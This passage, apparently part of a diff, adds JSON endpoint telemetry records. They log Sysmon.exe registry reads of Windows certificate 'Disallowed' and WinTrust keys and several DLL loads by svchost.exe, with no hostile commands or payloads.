"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "netprofm.dll", + "image_path": "C:\\Windows\\System32\\netprofm.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "npmproxy.dll", + "image_path": "C:\\Windows\\System32\\npmproxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsigd.dll", + "image_path": "C:\\Windows\\System32\\bitsigd.dll", + "pid": 3980, + 